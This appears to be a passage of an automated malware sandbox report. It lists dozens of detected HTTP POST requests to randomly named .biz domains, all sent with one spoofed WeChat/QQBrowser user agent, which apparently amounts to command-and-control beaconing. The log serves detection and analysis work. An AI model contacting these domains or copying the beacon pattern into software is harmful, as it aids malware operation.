Source: global traffic	HTTP traffic detected: POST /rifyadu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /lauq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /owesbtnhccxha HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rte HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /p HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /x HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /ceabvuhcchcwyyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /gcfjbafgheaeck HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /uextgbni HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /fvthsigvq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jftcpo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /jdfcrnyhggjio HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /sarbnswr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /nhxpdndgorr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /mxlx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /bss HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /hckdbdnsiwd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /bh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /dtupajxvn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /fkcgbfiiatbbgsse HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lfobofpdm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /wstlg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /sn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /ohrgkx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ovauxeggsejjr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /vekxop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /gblgywtx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /bjgrt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /tpndpotka HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /dona HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /qylgmshijgs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /nur HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /wveyxjtgsxs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /klflkg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /cisadtlsyrfn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /y HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /xymnprgj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /cjqgdtkxtfqqm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hmiutucdfnn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /yhjy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /om HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /gho HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ulgmbpj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /leqj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /ixcnnbyrmpnn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /iuqfwfkapu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /ymsikktgwjcaw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rvfsblrqhy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /wiuuagnokpngbsx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /kfmcpedbjr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /rifmhdkgmasf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /tbncyidxtibogxq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /eakdwqhsn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /bcjrqnssupbqc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /taks HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qbllddvxueecww HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /jaypbwnkuad HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /om HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /cnub HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /udqtfnpdyqh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /kacads HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /nuyubw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /rn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /enxhgeexxmda HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /pry HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /xrcr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
